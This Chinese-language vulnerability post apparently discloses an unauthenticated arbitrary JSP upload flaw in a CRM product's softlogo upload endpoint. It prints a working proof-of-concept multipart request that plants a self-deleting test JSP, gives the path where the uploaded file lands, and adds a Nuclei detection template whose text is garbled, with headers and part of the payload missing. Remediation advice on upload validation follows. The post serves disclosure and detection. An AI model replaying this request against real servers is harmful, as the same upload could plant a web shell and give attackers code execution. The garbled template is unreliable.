请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
POC如下所示:POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Content-Length: 693Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cache-Control: max-age=0Connection: closeContent-Type: multipart/form-data; boundary=----qiioxrvqmpuuubhaotnuUpgrade-Insecure-Requests: 1------qiioxrvqmpuuubhaotnuContent-Disposition: form-data; name="file"; filename="7ahrf590an.jsp"Content-Type: application/octet-stream<%out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>------qiioxrvqmpuuubhaotnuContent-Disposition: form-data; name="key"null------qiioxrvqmpuuubhaotnuContent-Disposition: form-data; name="form"null------qiioxrvqmpuuubhaotnuContent-Disposition: form-data; name="field"null------qiioxrvqmpuuubhaotnuContent-Disposition: form-data; name="filetitile"null------qiioxrvqmpuuubhaotnuContent-Disposition: form-data; name="filefolder"null------qiioxrvqmpuuubhaotnu--
链接地址如下所示:url+/userfile/default/userlogo/xxxxx.jsp
id: mt_crm_uploadinfo:name: mt_crm_uploadauthor: recjlseverity: criticaldescription: descriptionreference:https://tags: tagshttp:raw:|-POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1Host: {{Hostname}}: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36: 691Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: gzip, deflate, br: zh-CN,zh;q=0.9: max-age=0Connection: close: multipart/form-data; boundary=----qiioxrvqmpuuubhaotnu: 1------qiioxrvqmpuuubhaotnu: form-data; name="file"; filename="7ahrf590an.jsp": application/octet-streamjava.io.File(application.getRealPath(request.getServletPath())).delete();%>------qiioxrvqmpuuubhaotnu: form-data; name="key"null------qiioxrvqmpuuubhaotnu: form-data; name="form"null------qiioxrvqmpuuubhaotnu: form-data; name="field"null------qiioxrvqmpuuubhaotnu: form-data; name="filetitile"null------qiioxrvqmpuuubhaotnu: form-data; name="filefolder"null------qiioxrvqmpuuubhaotnu--: andmatchers:type: wordpart: bodywords:7ahrf590antype: statusstatus:200
修复建议
1、对上传文件类型进行验证,除在前端验证外在后端依然要做验证,后端可以进行扩展名检测,重命名文件,MIME类型检测以及限制上传文件的大小等限制来防御,或是将上传的文件其他文件存储服务器中。
2、严格限制和校验上传的文件,禁止上传恶意代码的文件。同时限制相关上传文件目录的执行权限,防止木马执行。
3、对上传文件格式进行严格校验,防止上传恶意脚本文件;
4、严格限制上传的文件路径。
5、文件扩展名服务端白名单校验。
6、文件内容服务端校验。
7、上传文件重命名。
8、隐藏上传文件路径。
